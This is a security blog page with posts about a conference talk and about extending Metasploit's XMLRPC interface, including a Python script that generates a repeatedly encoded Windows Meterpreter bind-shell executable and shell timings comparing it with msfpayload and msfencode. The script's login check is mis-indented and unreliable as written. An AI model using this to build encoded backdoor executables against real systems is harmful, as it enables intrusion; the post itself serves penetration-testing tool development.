Security Notes, News, and Thoughts

Slides and Code from Vegas

Thanks to all who came to see me present this week. I had a great time. I have gotten some good feedback from folks, and so I'm going to be updating a lot of code in the near future. Until then, I've put slides and code online for now. As I go through and clean up some stuff and release production versions I will be posting videos online. Until then, here are slides and code and if you have any questions feel free to email me or hit me up on twitter.




Fun with Metasploit payload generation

Tonight has been fun, I have been learning more about how payloads are generated inside Metasploit. My goal was to figure out how to add the msfencode functionality into the generate_simple function that is used by both XMLRPC and the console so that you can encode payloads and all that fun stuff from within Metasploit. I think I have it working now, and once Metasploit is loaded there seems to be a significant speed difference. Here is what I found:

I wrote a quick xmlrpc test to get an executable payload from Metasploit encoding it 7 times with whatever encoder it thinks is best. The code I'm using hasn't been committed or submitted yet, but if you want to test it I can provide you a patch until I'm happy enough with it to submit it.

import xmlrpclib
import binascii
proxy = xmlrpclib.ServerProxy("http://localhost:55553")

ret = proxy.auth.login("msf","abc123")
if ret['result'] == 'success':
token = ret['token']
print "Could not login\n"

opts = {
"Format" : 'exe',
"Iterations" : 7,
"ForceEncode" : True}

ret = proxy.module.execute(token,"payload","windows/meterpreter/bind_tcp",opts)
if(ret['result'] == 'success'):
print binascii.unhexlify(ret['payload'])

Next.. I decided to do a test of the xmlrpc vs the traditional way of doing it:

[email protected]:~/msfmods/py# time (python > /tmp/test3)

real 0m3.839s
user 0m0.020s
sys 0m0.043s
[email protected]:~/msfmods/py# time (~/metasploit/msfpayload windows/meterpreter/bind_tcp raw | ~/metasploit/msfencode -t exe -c 5 -o /tmp/test2 2>/dev/null )

real 0m10.548s
user 0m7.553s
sys 0m2.920s
[email protected]:~/msfmods/py# file /tmp/test2 /tmp/test3
/tmp/test2: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
/tmp/test3: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit

It definitely appears we have a speed increase, and with the additional overhead of an auth in the way, it's possible to take a little bit more time off of it. Being able to do this over XMLRPC hopefully will give a good way for folks to grab payloads remotely and easily for common tasks.

Have thoughts or suggestions ?

Hit me up at sussurro [aT] happypacket DOT net

Sharing data remotely through Metasploit

I've been working on some more XMLRPC stuff for Metasploit, and I wanted to share just a teaser for what is to come in the future. I'm working on some more integration between tools, but for now I have written a db module for Metasploit's XMLRPC engine which allows remote processes to get information from the database. Below is a quick demo of a remote host, having done a scan with nmap uploading remotely the data into Metasploit for it to be acted on. This of course is just the tip of the iceberg, as this API will allow for automated reporting, data sharing across tools, for Metasploit to be used as the central knowledge repository for various tools across multiple testers machines to store data.

I'm still waiting to hear back from Defcon and B-Sides Las Vegas, but if my talk gets accepted either place, you will get to see a whole lot more.

Sorry for the blurry, I'll do better next time:

Sharing data between hosts with Metasploit from Ryan Linn on Vimeo.

There was an error in this gadget